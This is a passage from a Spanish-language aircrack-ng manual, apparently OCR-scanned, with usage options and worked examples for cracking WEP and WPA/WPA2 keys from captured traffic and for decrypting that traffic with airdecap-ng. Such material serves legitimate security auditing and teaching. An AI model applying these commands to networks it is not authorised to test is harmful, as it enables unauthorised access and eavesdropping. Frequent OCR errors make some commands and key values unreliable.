béisbol eon estadísticas y luego usar la fuerza bruta para terminar el trabajo. Aircraek-ng usa la 
fuerza bruta en las claves probables para determinar realmente la clave WEP seereta. 

Aqui es donde entra enjuego el faetor fudge. Básieamente, el faetor fudge le diee al airerack-ng que 
tan ampliamente es la fuerza bruta. Es como tirar una pelota al campo y luego deeirle a alguien que 
la pelota esté en algún lugar entre 0 y 10 metros (0 y 30 pies) de distancia. Versus diciendo que la 
pelota está en algún lugar entre 0 y 100 metros (0 y 300 pies) de distaneia. El escenario de 100 
metros tardará mucho más en buscar que el de 10 metros, pero es más probable que eneuentres la 
pelota eon la búsqueda más amplia. Es una compensación entre el periodo de tiempo y la 
probabilidad de encontrar la clave WEP secreta. 

Por ejemplo, si le diee a aircraek-ng que use un factor 2 de fúdge, toma los votos del oeteto más 
posible y verifiea todas las demás posibilidades que son al menos la mitad de esta posible en base a 
la fuerza bruta. Cuanto mayor sea el factor de fúdge, mayores serán las posibilidades que aireraek- 
ng intentará sobre la base de la fuerza bruta. Tenga en cuenta que a medida que aumenta el factor 
fudge, el número de elaves seeretas para probar aumenta enormemente y, en consecuencia, el 
tiempo transcurrido también aumenta. Por lo tanto, eon más datos disponibles, se puede minimizar 
la necesidad de fuerza bruta, que requiere mucha CPU y mucho tiempo. 

Para deseifrar elaves WEP, también se incluye un método de dieeionario. Para WEP, puede usar el 
método estadístico descrito anteriormente o el método de dieeionario, no ambos al mismo tiempo. 
Con el método del dieeionario, primero crea un arehivo con claves aseii o hexadeeimales. Un solo 
archivo solo puede contener un tipo, no una mezela de ambos. Esto se usa como entrada para 
airerack-ng y el programa prueba eada teela para determinar si es eorreeta. 

Eas técnicas y la propuesta anterior no fúncionan para las claves precompartidas WPA/ WPA2. Ea 
única forma de descifrar estas claves preeompartidas es mediante un ataque de diccionario. Esta 
capacidad también se ineluye en aircrack-ng. Con claves preeompartidas, el eliente y el punto de 
acceso establecen material de elaves para su eomunicación desde el principio, cuando el cliente se 
asocia por primera vez eon el punto de acceso. Hay un handshake de 4 vias entre el cliente y el 
punto de aceeso. Airodump-ng puede capturar este handshake de 4 vias. Utilizando la entrada de 
una lista de palabras proporcionada (diccionario), aircrack-ng duplica el handshake de 4 vias para 
determinar si una entrada partieular en la lista de palabras eoincide con los resultados del handshake 
de 4 vias. Si lo haee, la clave preeompartida se ha identifieado correctamente. 

Cabe señalar que este proeeso es computaeionalmente intensivo y, por lo tanto, en la práctiea, es 
poeo probable que se determinen claves preeompartidas muy largas o inusuales. Una lista de 
palabras de buena ealidad le dará los mejores resultados. Otra propuesta es utilizar una herramienta 
como John the Ripper para generar conjeturas de contraseña que a su vez se introducen en airerack- 

ng. 



4.3. Explicación del campo Depth y el factor Fudge 


La mejor explicación es un ejemplo. Veamos un octeto específico. Todos los octetos se procesan de 
la misma manera. Tienes los votos como en la captura de pantalla anterior. Para el primer octeto se 
ven como: AE (50) 11 (20) 71 (20) 10 (12) 84 (12) 

Los AE, 11,71, 10y84 son la posible clave secreta para el octeto de clave 0. Los números entre 
paréntesis son los votos que cada clave secreta posible ha acumulado hasta ahora. 

Ahora si se decide utilizar un factor de fudge de 3. aircrack-ng toma el voto del octeto AE(50) más 
posible: 

50/3 = 16.666666 

Aircrack-ng probará (fuerza bruta) todas las claves posibles con un voto mayor a 16.6666, 
resultando en AE, 11,71 siendo probado, entonces tenemos una profundidad total de 3: 

0/3 AE (50) 11 (20) 71 (20) 10 (12) 84 (12) 

Cuando aircrack-ng está probando claves con AE, muestra 0/3, si tiene todas las claves probadas 
con este octeto, cambia al siguiente (11 en este caso) y muestra: 

1/11 11 (20) 71 (20) 10 (12) 84 (12) 

4.4. Uso 

aircrack-ng [opciones] <ficheros .cap / .ivs> 

Puede especificar varios archivos de entrada, ya sea en formato .cap o .ivs o usar el nombre de 
archivo comodin. Además puede ejecutar tanto airodump-ng como aircrack-ng al mismo tiempo: 
aircrack-ng se actualizará automáticamente cuando haya nuevos IV disponibles. 

Opciones comunes: 


-a <amode> 

El modo de ataque (1/WEP, 2/WPA-PSK) 

-e <essid> 

Selección del objetivo: identificador de red 

-b <bssid> 

Selección del objetivo: MAC del punto de acceso 

-p <nbcpu> 

# de CPU a usar. Por defecto todas las CPUs 

-q 

habilitar el modo silencioso sin salida del estado 

-C <macs> 

fusionar los puntos de acceso a uno virtual 

-1 <file> 

Escribir la clave en un fichero 


Opciones de craqueo WEP estático : 


-c 

Solo búsqueda de caracteres alfanuméricos 

-t 

Solo búsqueda de caracteres binarios decimales 

-h 

Búsqueda de la clave numérica para EritzlBOX 

-d <mask> 

Usar la máscara de la clave (A1:XX:CE:YY) 

-m <maddr> 

Dirección MAC para filtrar los paquetes útiles 

-n <nbits> 

Longitud de la clave WEP: 64/128/152/256/512 

-i <index> 

índice de la clave WEP (1 to 4). Por defecto ninguna 

-f <fudge> 

factor de fúndición de fuerza bruta. Valor predeterminado: 2 

-k <korek> 

Desactivar un método de ataque (1 to 17) 

-X or-xO 

Desactivar la fuerza bruta para los últimos octetos de la clave 





-xl 

fuerza bruta para los últimos oetetos de la clave (por defecto) 

-x2 

fuerza bruta para los 2 últimos octetos de la clave 

-X 

Desactivar la fuerza bruta multithreading 

-y 

modo experimental de fuerza bruta 

-K 

Usar solo los ataques viejos KoreK (pre-PTW) 

-s 

Mostrar la clave en ASCII mientras se eraquea 

-M <num> 

Especificar el número máximo de IV a usar 

-D 

WEP deeloak, salta los flujos de clave rotos 

-P <num> 

Depuraeión PTW:1: desactivar Klein, 2: PTW 

-1 

ejecutar solo 1 intento de descifrar la clave con PTW 


Opciones de eraqueo WEP y WPA-PSK: 


-w <words> 

Ruta del fichero de la lista de palabras separadas por comas 

-N <archivo> 

Crea una nueva sesión de craqueo y la guarda en el archivo 
especificado 

-R <archivo> 

Restaura la sesión guardada en el archivo especificado 


Opciones WPA-PSK: 


-E <file> 

Crear el fichero EWSA Project v3 

-j <file> 

Crea el fichero Hashcat v3.6+ Capture (HCCAPX) 

-J <file> 

Crear el fichero Hashcat Capture 

-S 

Prueba de veloeidad de eraqueo WPA 

-Z <seg> 

Duración de la ejecución de la prueba de veloeidad de 
craqueo WPA 

-r <DB> 

ruta a la base de datos de airolib-ng 


Selección SIMO 


—simd <optimization> 

Usar la optimización SIMD especificada por el 
usuario en lugar de la más rápida 

—simd-list 

Muestra una lista de las optimizaeiones SIMD 
disponibles 


Otras opciones: 


-u 

Visualiza el # de CPUs y el soporte MMX/SSE 

-H 

Visualiza esta pantalla de ayuda 


4.5. Ejemplos 
4.5.1. WEP 






El caso más simple es deseifrar una clave WEP. Si desea probarlo usted mismo, aquí hay un arehivo 
de prueba. La elave del arehivo de prueba eoineide eon la imagen de la pantalla anterior, no 
eoincide con el siguiente ejemplo. 

airerack-ng -K 128bit.ivs 

donde: 

• 128bit.ivs es el nombre del arehivo que eontiene IVS. 

• -K: usa solo los ataques KoreK 
El programa responde: 

Opening 128bit.ivs 
Read 684002 packets. 

# BSSID ESSID Eneryption 

1 00:14:6C:04:57:9B WEP (684002 IVs) 


Choosing first network as target. 

Si había varias redes contenidas en el arehivo, se le da la opeión de seleecionar eual desea. Por 
defecto, aircrack-ng supone un cifrado de 128 bits. 

El proceso de eraqueo eomienza y una vez descifrado, se ve así: 

Aircraek-ng 1.4 

[00:00:10] Tested 77 keys (got 684002 IVs) 


KB depth byte(vote) 

0 0/ 1 AE( 199)29( 27)2D( 13) 7C( 12) EE( 12) EE( 6) 39( 5) 2C( 3) 00( 0) 08( 0) 

1 0/ 3 66( 41)E1( 33)4C( 23) 00( 19)9E( 19)C7( 18)64( 9) 7A( 9) 7B( 9) E6( 9) 

2 0/ 2 5C( 89)52( 60) E3( 22) 10( 20) E3( 18) 8B( 15) 8E( 15) 14( 13)D2( 11)47( 10) 

3 0/ 1 FD( 375) 81( 40) 1D( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) 0B( 17) 35( 17) 

4 0/ 2 24( 130) 87( 110)7B( 32) 4F( 25) D7( 20) F4( 18) 17( 15) 8A( 15) CE( 15) El( 15) 

5 0/ 1 E3(222)4F( 46) 40( 45) 7F( 28) DB( 27) E0( 27) 5B( 25) 71( 25) 8A( 25) 65( 23) 

6 0/ 1 92(208)63( 58) 54( 51)64( 35)51( 26) 53( 25) 75( 20) 0E( 18)7D( 18)D9( 18) 

7 0/ 1 A9(220)B8( 51)4B( 41) 1B( 39) 3B( 23) 9B( 23) FA( 23) 63( 22) 2D( 19) 

1A( 17) 

8 0/ 1 14(1106) Cl( 118) 04( 41) 13( 30) 43( 28) 99( 15 ) 1 % 20)B1( 17) 86( 15)97( 15) 

9 0/ 1 39(540)08( 95) E4( 87) E2( 79) E5( 59) 0A( 44) CC( 35) 02( 32) C7( 31)6C( 30) 

10 0/ 1 D4(372)9E( 68)A0( 64) 9F( 55) DB( 51)38( 40) 9D( 40) 52( 39)A1( 38) 

54( 36) 

11 0/ 1 27(334)BC( 58)F1( 44) BE( 42) 79( 39) 3B( 37)E1( 34) E2( 34)31( 33) 

BF( 33) 


KEYFOUND! [ AE:66:5C:FD:24:E3:92:A9:14:39:D4:27:4B ] 

NOTA: La clave ASCII WEP se muestra solo euando el 100% de la elave hexadeeimal se puede 
convertir a ASCII. Esta elave se puede usar para coneetarse a la red. 

A eontinuaeión, observamos eomo descifrar WEP con un diccionario. Para hacer esto, neeesitamos 
arehivos de dieeionario con claves ascii o hexadecimales para probar. Reeuerde, un solo arehivo 
solo puede tener elaves ascii o hexadecimales, no ambas. Las elaves WEP se pueden ingresar en 
hexadeeimal o aseii. La siguiente tabla deseribe euántos earaeteres de eada tipo se requieren en sus 
arehivos. 



Eongitud de la clave 
WEP en bits 

Caracteres 

hexadecimales 

Caracteres ASCII 

64 

10 

5 

128 

26 

13 

152 

32 

16 

256 

58 

29 


Ejemplo clave ascii 64 bits: “ABCDE” 

Ejemplo clave hexadecimal 64 bits: “12:34:56:78:90” 

Ejemplo clave ascii 128 bits: “ABCDEABCDEABC” 

Ejemplo clave hexadecimal 128 bits: “12:34:56:78:90:12:34:56:78:90:12:34:56” 

Al diccionario WEP descifrar una clave de 64 bits: 

aircrack-ng -w h:hex.txt, ascii.txt -a 1 -n 64 -e teddy weplO-Ol.cap 

donde: 

• -w h: hex.txt, ascii.txt es la lista de archivos a utilizar. Para los archivos que contienen 
valores hexadecimales, debe poner una "h:" delante del nombre del archivo. 

• -al dice que es WEP 

• -n 64 dice que son 64 bits. Cambie esto a la longitud de la clave que coincida con sus 
archivos de diccionario. 

• -e teddy es seleccionar opcionalmente el punto de acceso. También puede usar la opción 
b" para seleccionar según la dirección MAC 

• wep 10-01.cap es el nombre del archivo que contiene los datos. Puede ser el paquete 
completo o un archivo solo de IV. Debe contener un mínimo de cuatro IV. 

A continuación un ejemplo de una salida: 

Aircrack-ng 1.4 

[00:00:00] Tested 2 keys (got 13 IVs) 


KB depth byte(vote) 


0 

0/ 

0 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

I 

0/ 

0 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

2 

0/ 

0 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

3 

0/ 

0 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

4 

0/ 

0 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 

00( 

0) 


KEYEOUND! [ 12:34:56:78:90] 

Probability: 100% 

Veamos un ejemplo de ataque PTW. Recuerde que este método requiere paquetes de solicitud / 
respuesta arp como entrada. Debe ser el paquete completo y no solo los IV, lo que significa que la 
opción "- ivs" no se puede usar al ejecutar airodump-ng. Además solo funciona para el cifrado WEP 
de 64 y 128 bits. 

Ejecutar el siguiente comando: 
aircrack-ng -z ptw*.cap 
donde: 

• -z significa usar la metodología PTW para descifrar la clave wep. Nota: en vi .x, este es el 
modo de ataque predeterminado; use -K para volver a Korek. 

• ptw * .cap son los archivos de captura a utilizar. 


El sistema responde: 



Opening ptw-Ol.cap 
Read 171721 packets. 

# BSSID ESSID Encryption 

1 00;14:6C:7E:40:80 teddy WEP (30680 IVs) 

Choosing first network as target. 

Entonces: 

Aircrack-ng 1.4 

[00:01:18] Tested 0/140000 keys (got 30680 IVs) 

KB depth byte(vote) 

0 0/ 1 12( 170) 35( 152) AA( 146) 17( 145) 86( 143) E0( 143) AE( 142) C5( 142) D4( 142) 50( 
140) 

1 0/ 1 34( 163) BB( 160) CE( 147) 59( 146) 39( 143) 47( 142) 42( 139) 3D( 137) 7E( 137) 

18(136) 

2 0/ 1 56( 162) E9( 147) 1E( 146) 32( 146) 6E( 145) 79( 143) E7( 142) EB( 142) 75( 141) 

31(140) 

3 0/ 1 78( 158) 13( 156) 01( 152) 5E( 151) 28( 149) 59( 145) EC( 145) 7E( 143) 76( 142) 

92(142) 

4 0/ 1 90( 183) 8B( 156) D7( 148) E0( 146) 18( 145) 33( 145) 96( 144) 2B( 143) 88( 143) 

41( 141) 

KEYEOUND! [ 12:34:56:78:90] 

Decrypted correctly: 100% 

4.5.2. WPA 

Ahora sobre descifrar frases de eontraseña WPA / WPA2. Aircraek-ng puede romper cualquier tipo. 

airerack-ng -w contraseña.Ist * .cap 

donde: 

• -w contraseña.Ist es el nombre del archivo de contraseña. Recuerde especifiear la ruta 
completa si el arehivo no se eneuentra en el mismo directorio. 

• * .cap es el nombre del grupo de arehivos que eontienen los paquetes capturados. Observe 
en este caso que usamos el eomodin * para incluir varios archivos. 

El programa responde: 

Opening wpa2.eapol.eap 
Opening wpa.cap 
Read 18 paekets. 

# BSSID ESSID Eneryption 

1 00:14:6C:7E:40:80 Harkonen WPA(1 handshake) 

2 00:0D:93:EB:B0:8C test WPA (1 handshake) 

Index number of target network ? 

Observe en este caso que, dado que hay varias redes, debemos seleeeionar cual atacar. 
Seleccionamos el número 2. El programa responde: 

Aircraek-ng 1.4 

[00:00:03] 230 keys tested (73.41 k/s) 



KEY FOUND! [ biscotte ] 


Master Key : CD D7 9A 5A CF BO 70 C7 F9 D1 02 3B 87 02 85 D6 
39 E4 30 B3 2F 31 AA37 AC 82 5A55 B5 55 24 FE 

Transcient Key : 33 55 OB FC 4F 24 84 F4 9A 38 B3 DO 89 83 D2 49 
73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 
D9 6F 76 5B 8C D3 DE 13 2F BC DA 6A 6E D9 62 CD 

EAPOE HMAC : 52 27 B8 3F 73 7C 45 AO 05 97 69 5C 30 78 60 BD 

Ahora tiene la frase de contraseña y puede conectarse a la red. 

4.5.3. SIMD 

Aircrack-ng está compilado con múltiples optimizaciones basadas en caracteristicas de CPU que 
llamamos motores de cifrado. Fas caracteristicas de la CPU son diferentes según el tipo de CPU. En 
x86 (y 64 bits), normalmente están disponibles SSE2, AVX y AVX2 (AVX512 puede compilarse 
pero solo debe hacerse si la CPU actual lo admite). En ARM, neóny ASIMD generalmente están 
disponibles y en PowerPC, ASIMD y altivec. Una optimización genérica siempre está disponible 
sin importar en que arquitectura se compila o para que. Un conjunto limitado de optimizaciones 
puede estar disponible dependiendo del sistema operativo / CPU / compiladores disponibles. 

Al ejecutar aircrack-ng, se cargará la optimización más rápida según lo que admita su CPU. Para los 
mantenedores de paquetes, es muy útil ya que no tienen que apuntar al que admite toda la CPU, que 
seria el más lento. Para anular, se puede usar la opción —simd. 

aircrack-ng —simd=avx wpa.cap -w password.lst 

Para enumerar todas las optimizaciones SIMD disponibles, usar —simd-list. Como 
aircrack-ng —simd-list 

4.5.4. Sesión de craqueo 

A veces el craqueo puede llevar mucho tiempo y a veces es necesario apagar la computadora o 
ponerla en suspensión por un tiempo. Para manejar este tipo de situación, se ha creado un nuevo 
conjunto de opciones. 

Creará y / o actualizará un archivo de sesión guardando el estado actual del craqueo (cada 10 
minutos), asi como todas las opciones utilizadas, listas de palabras y archivos de captura utilizados. 
Se pueden usar varias listas de palabras y fúnciona con WEP y WPA. 
aircrack-ng —new-session current.session -w password.lst,english.txt wpa-Ol.cap 

Con el fin de restaurar la sesión, ejecutar use —restore-session: 
aircrack-ng —restore-session current.session 

Continuará actualizando la sesión actual cada 10 minutos. 

Eimitaciones: 

• Ea lista de palabras debe ser un archivo. 



• La sesión se debe restaurar desde el mismo directorio que cuando se usa por primera vez - 
new-session 

• No se pueden agregar nuevas opciones al restaurar la sesión 

4.6.Trucos 

4.6.1. Propuesta general para craquear claves WEP 

Claramente la propuesta más simple es ejecutar "aircrack-ng capture-data.cap" y dejarlo ir. Dicho 
esto, existen algunas técnicas para mejorar sus posibilidades de encontrar la clave WEP 
rápidamente. No hay un solo conjunto mágico de pasos. A continuación se describen algunas 
propuestas que tienden a producir la clave más rápido. 

Si está capturando paquetes de solicitud / respuesta arp, entonces la propuesta más rápida es usar 
"aircrack-ng -z <archivos de captura de paquetes de datos>". Entonces puede omitir el saldo de esta 
sección ya que encontrará la clave muy rápidamente asumiendo que ha recopilado suficientes 
paquetes de solicitud / respuesta de arp! NOTA; -z es el modo de ataque predeterminado en 
aircrack-ng vl.x; usar -Kpara volver al modo de ataque usado en versiones anteriores. 

Ea técnica principal es capturar tantos datos como sea posible. Esa es la tarea más importante. El 
número de vectores de inicialización (IV) que necesita para determinar la clave WEP varia 
dramáticamente según la longitud de la clave y el punto de acceso. Por lo general se necesita 
250.000 o más IVs únicos para claves de 64 bits y 1,5 millones o más para claves de 128 bits. 
Claramente mucho más para longitudes de bits de clave más largas. Entonces hay suerte. Habrá 
ocasiones en que la clave WEP se puede determinar con tan solo 50.000 IV, aunque esto es raro. Por 
el contrario habrá momentos en los que necesitará varios millones de IV para descifrar la clave 
WEP. El número de IV es extremadamente difícil de predecir ya que algunos puntos de acceso son 
muy buenos para eliminar los IV que llevan la clave WEP. 

En general no intentar descifrar la clave WEP hasta que tenga 200.000 IV o más. Si comienza 
demasiado temprano, el aircrack tiende a pasar demasiado tiempo para las claves de fúerza bruta y 
no aplicando adecuadamente las técnicas estadísticas. Comience probando las teclas de 64 bits 
"aircrack-ng -n 64 capture-data.cap". Si están usando un WEP de 64 bits, generalmente se puede 
descifrar en menos de 5 minutos (generalmente menos de 60 segundos) con relativamente pocos IV. 
Es sorprendente cuantos AP solo usan claves de 64 bits. Si no encuentra la clave de 64 bits en 5 
minutos, reinicie aircrack en el modo genérico: "aircrack-ng capture-data.cap". Euego, en cada 
marca de 100,000 IVs, vuelva a intentar el "aircrack-ng -n 64 capture-data.cap" durante 5 minutos. 

Una vez que llegue a 600.000 IVs, cambie a probar claves de 128 bits. En este punto, es poco 
probable que sea una clave de 64 bits y 600.000 IV no la descifraron. Así que ahora intente 
"aircrack-ng capture-data.cap". Una vez que llegue a 2 millones de IV, intente cambiar el factor 
fudge a "-f 4". Ejecutar durante al menos 30 minutos a una hora. Vuelva a intentarlo, aumentando el 
factor fudge de 4 en 4 cada vez. Otro momento para intentar aumentar el factor fúdge es cuando el 
aircrack-ng se detiene porque ha probado todas las claves. 

Todo el tiempo, sigue recopilando datos. Recuerde la regla de oro, "cuanto más IVs, mejor". 

4.6.2. Como determinar que opciones usar 

Mientras se ejecuta aircrack-ng, la mayoría de las veces solo se ve el comienzo de la clave. Aunque 
la clave WEP secreta es desconocida en este momento, puede haber pistas para acelerar las cosas. Si 
los octetos de la clave tienen un número bastante grande de votos, entonces es probable que sean 
99.5% correctos. Así que echemos un vistazo a lo que puede hacer con estas pistas. Si los octetos 
son, por ejemplo: 75: 47: 99: 22: 50, entonces es bastante obvio que la clave completa puede 



consistir solo en números, eomo los primeros 5 octetos. Por lo tanto, PUEDE mejorar su velocidad 
de eraqueo para usar la opeión -t solo cuando intenta estas claves. 


Si los oetetos son 37: 30: 31: 33: 36, que son todos valores numéricos cuando se convierten a Ascii, 
es una buena idea usar la opeión -h. Y si los primeros oetetos son algo asi como 74: 6E: 70: 73: 65, 
y al ingresarlos en su editor hexadeeimal o en los enlaces provistos en la sentencia anterior, verá 
que pueden formar el comienzo de alguna palabra, entonces pareee es probable que se use una clave 
ASCII, por lo tanto, aetiva la opeión -c para verificar solo las claves ASCII imprimibles. 

Si conoce el inicio de la clave WEP en hexadeeimal, puede ingresar eon el parámetro "-d". 
Supongamos que sabe que la clave WEP es "0123456789" en hexadeeimal, entonces podría usar "-d 
01" o "-d 0123", etc. Otra opción a probar cuando tiene problemas para determinar la elave WEP, es 
la opeión "-x2", que hace que los 2 últimos octetos sean forzados en lugar del valor predeterminado 
de uno. 

4.6.3. Como convertir la clave HEX WEP a ASCII 

Ver el apartado siguiente. 

4.6.4. Como usar la clave 

Si aircrack-ng determina la clave, se le presentará en formato hexadeeimal. Suele verse asi: 
KEYEOUND! [11:22:33:44:55] 

Ea longitud variará según la longitud de la clave de bit WEP utilizada. Recuerde que la mayoría de 
las claves no se pueden convertir a formato ASCII. Si la clave HEX es de heeho caracteres ASCII 
válidos, también se mostrará el ASCII. 

Además Aircrack-ng imprime un mensaje que indiea la probabilidad de que la clave sea correeta. Se 
verá algo similar a "Probabilidad: 100%". Airerack-ng prueba la clave contra algunos paquetes para 
confirmar que la elave es correcta. Basado en estas pruebas, imprime la probabilidad de una clave 
correeta. 

4.6.5. Como convertir una clave hexadeeimal en una frase 

Ea gente a menudo pregunta si la clave hexadeeimal eneontrada por aircrack-ng puede convertirse 
en una frase. Ea respuesta simple es no. Para entender porque esto es asi, echemos un vistazo a 
como estas frases de contraseña se convierten en las claves hexadecimales utilizadas en WEP. 
Algunos proveedores tienen un generador de claves wep que "traduce" una frase de contraseña en 
una clave WEP hexadeeimal. No hay estándares para esto. Muy a menudo simplemente rellenan 
frases cortas con espacios en blanco, ceros u otros caracteres. Sin embargo, por lo general, las frases 
de contraseña se rellenan con ceros de hasta 16 bytes, y luego el MD5SUM de este bytestream será 
la clave WEP. Recordar que eada proveedor puede haeer esto de una manera ligeramente diferente, 
por lo que es posible que no sean eompatibles. 

Por lo tanto no hay forma de saber cuanto tiempo duró la frase de contraseña original. Podría ser tan 
corto como un personaje. Todo depende de quién desarrolló el software. Sabiendo todo esto, si aún 
desea intentar obtener la frase de contraseña original. Latín SuD tiene una herramienta que intenta 
revertir el proeeso. No obstante estas frases de contraseña dan eomo resultado una elave WEP que 
se descifra tan fácilmente como cualquier otra clave WEP. El método de eonversión exacto 
realmente no importa al final. 

Tener en cuenta que las eontraseñas wep que pareeen "texto plano" pueden ser ASCII o 
PASSPHRASE. La mayoría de los sistemas admiten ASCII y son los predeterminados, pero algunos 
admiten la frase de contraseña y aquellos que la admiten requieren que los usuarios especifiquen si 
es ascii o una frase de contraseña. Las frases de contraseña pueden tener cualquier longitud 



arbitraria. Los ASCII generalmente están limitados a 5 o 13 (wep40 y wepl04). Windows WZC 
solo admite claves hexadecimales o ascii de longitud fija, por lo que la clave de entrada más corta 
tiene 5 caracteres de longitud. 

4.6.6. Ficheros de muestra a probar 

Hay varios archivos de muestra que puedes probar con aircrack-ng para ganar experiencia: 

• wpa.cap: este es un archivo de muestra con un handshake wpa. Se encuentra en el directorio 
"test" de los archivos de instalación. La frase de contraseña es "biscotte". Usar el archivo de 
contraseña (password.lst) que se encuentra en el mismo directorio. 

• wpa2.eapol.cap: este es un archivo de muestra con un handshake wpa2. Se encuentra en el 
directorio "test" de los archivos de instalación. La frase de contraseña es "12345678". Use el 
archivo de contraseña (password.lst) que se encuentra en el mismo directorio. 

• test.ivs: este es un archivo de clave WEP de 128 bits. La clave es "AE: 5B: 7F: 3A: 03: DO: 
AE: 9B: F6: 8D: A5: E2: C7". 

• ptw.cap: este es un archivo de clave WEP de 64 bits adecuado para el método PTW. Ea clave 
es "IF: IF: IF: IF: IF". 

• wpa-psk-linksys.cap: este es un archivo de muestra con un handshake WPAl junto con 
algunos paquetes cifrados. Útil para probar con airdecap-ng. La contraseña es "dictionary". 

• wpa2-psk-lirLksys.cap: este es un archivo de muestra con un handshake WPA2 junto con 
algunos paquetes cifrados. Útil para probar con airdecap-ng. La contraseña es "dictionary". 

4.6.7. Formato del diccionario 

Los diccionarios utilizados para la fuerza bruta WPA / WPA deben contener una frase de contraseña 
por linea. El formato de final de linea de Finux y Windows es ligeramente diferente. Hay 
herramientas de conversión disponibles tanto en Finux como en Windows que pueden convertir un 
formato a otro. Además los editores están disponibles en ambos sistemas operativos que pueden 
editar ambos formatos correctamente. Depende del lector utilizar un motor de búsqueda en Internet 
para encontrar las herramientas adecuadas.Sin embargo, ambos tipos deberian funcionar con las 
versiones de linux o Windows de aircrack-ng. Por lo tanto, realmente no necesita convertir de ida y 
vuelta. 

4.6.8. Diccionario de clave hexadecimal 

Aunque no es parte de aircrack-ng, vale la pena mencionar que SuD realiza un trabajo interesante. 
Básicamente es un diccionario wep hexadecimal ya preparado y el programa para ejecutarlo: 
https://www.latinsud.com/pub/wepdict/ 

4.6.9. Herramientas para dividir ficheros capturados 

Hay momentos en que desea dividir los archivos de captura en partes más pequeñas. Por ejemplo, 
los archivos con una gran cantidad de IV pueden ocasionar que el ataque PTW falle. En este caso, 
vale la pena dividir el archivo en partes más pequeñas y volver a intentar el ataque PTW. 

Asi que aqui hay dos herramientas para dividir archivos de captura: 

• https://www.badpenguin.co.uk/files/pcap-util 

• https://www.badpenguin.co.uk/files/pcap-util2 

Otra técnica es usar Wireshark / tshark. Puede marcar los paquetes y luego colocarlos en un archivo 
separado. 

4.6.10. Como extraer un handshake WPA de un gran fichero de 
captura 




A veces se tiene un archivo de captura muy grande y se desea extraer los handshake WPA / WPA2 
de él a un archivo separado. Se puede hacer con "tshark", que es una versión de linea de comandos 
de la suite Wireshark. 

El siguiente comando extraerá todos los paquetes de handshake y beacon de su archivo de captura 
pcap y creará un archivo separado con solo esos paquetes: 

tshark -r <nombre del archivo de entrada> -R "eapol || wlan.fc.type subtype == 0x08" -w <nombre 
del archivo de salida> 

Recuerde que debe usar un archivo pcap como entrada, no un archivo IV. 



5. Airdecap-ng 


Airdecap-ng nos permite descifrar el tráfico inalámbrico una vez que hemos descifrado la clave. En 
otras palabras, una vez que tenemos la clave en el punto de acceso inalámbrico, no solo podemos 
use el ancho de banda en el punto de acceso, sino que también con airdecap-ng podemos descifrar 
todo el tráfico del punto de acceso y todo lo que están haciendo. 

El archivo de captura debe contener un handshake de 4 vias válido. Para este propósito, tener 
(paquetes 2 y 3) o (paquetes 3 y 4) funcionará correctamente. De hecho, realmente no necesita los 4 
paquetes del hanshake. 

Además solo se descifrarán los paquetes de datos que siguen al protocolo de enlace. Esto se debe a 
que se requiere información del protocolo de enlace para descifrar los paquetes de datos. 

uso: airdecap-ng [opciones] <pcap file> 

Opciones comunes: 


-1 

No eliminar la cabecera 802.11 

-b <bssid> 

Eiltrar la dirección MAC del AP 

-e <essid> 

SSID de la red objetivo 

-0 <fname> 

Pichero de salida para los paquetes descifrados 
Por defecto <src>-dec 

—help 

Visualiza esta ayuda 


Opciones especificas de WEP: 


-w <key> 

clave WEP de la red objetivo en hexadecimal 

-c <fname> 

fichero de salida para los paquetes WEP corruptos. 

Por defecto <src>-bad 


Opciones especificas de WPA: 


-p <pass> 

Erase de contraseña WPA de la red objetivo 

-k <pmk> 

WPA Pairwise Master Key en hexadecimal 


Ejemplos 

1. Eo siguiente elimina los encabezados inalámbricos de una captura de red abierta (sin WEP): 
airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap 

2. Eo siguiente descifra una captura encriptada WEP utilizando una clave hexadecimal WEP: 
airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap 


3.Eo siguiente descifra una captura encriptada WPA / WPA2 usando la frase de contraseña: 
airdecap-ng -e ’the ssid' -p passphrase tkip.cap 






6. Airdecloak-ng 


Airdecap-ng puede descifrar archivos de captura WEP/WPAAVPA2 y también se puede utilizar para 
quitar los encabezados inalámbricos de una captura inalámbrica no encriptada. Emite un nuevo 
archivo que termina con -dec.cap, que es la versión descifrada / eliminada del archivo de entrada. 

Airdecloak-ng elimina el encubrimiento WEP de un archivo pcap. Eunciona leyendo el archivo de 
entrada y seleccionando paquetes de una red especifica. Cada paquete seleccionado se coloca en 
una lista y se clasifica (el estado predeterminado es "desconocido"). 

Cada paquete seleccionado se coloca en una lista y se clasifica. El estado predeterminado es 
"unknown". Euego se aplican los filtros en el orden especificado por el usuario en esta lista. 
Cambiarán el estado de los paquetes (unknown, sin codificación, potencialmente oculto o oculto). 

El orden de los filtros es realmente importante ya que cada filtro basará su análisis, entre otras 
cosas, en el estado de los paquetes y los diferentes pedidos darán resultados diferentes. 

El archivo pcap debe tener todos los paquetes incluids los beacons y todos los demás paquetes 
"inútiles" para el análisis y si es posible los encabezados de prisma / radiotap. 

Uso: airdecloak-ng [opciones] 


Opciones obligatorias 


-i <file> 

Eichero de captura de entrada 

-ssid <ESSID> 

ESSID de la red a filtrar 

-bssid <BSSID> 

BSSID de la red a filtrar 


Opciones opcionales 


—filters <filters> 

Aplicar filtros separados por una coma. Elitros: 

- signal: intenta filtrar según la señal. 

- duplicate sn: elimina todos los números de secuencia duplicados 
tanto para el AP como para el cliente. 

- duplicate sn ap: elimina el número de secuencia duplicado solo 
para el AP. 

- duplicate sn client: elimina el número de secuencia duplicado solo 
para el cliente. 

- consecutive sn: filtro basado en el hecho de que IV debe ser 
consecutivo (solo para AP). 

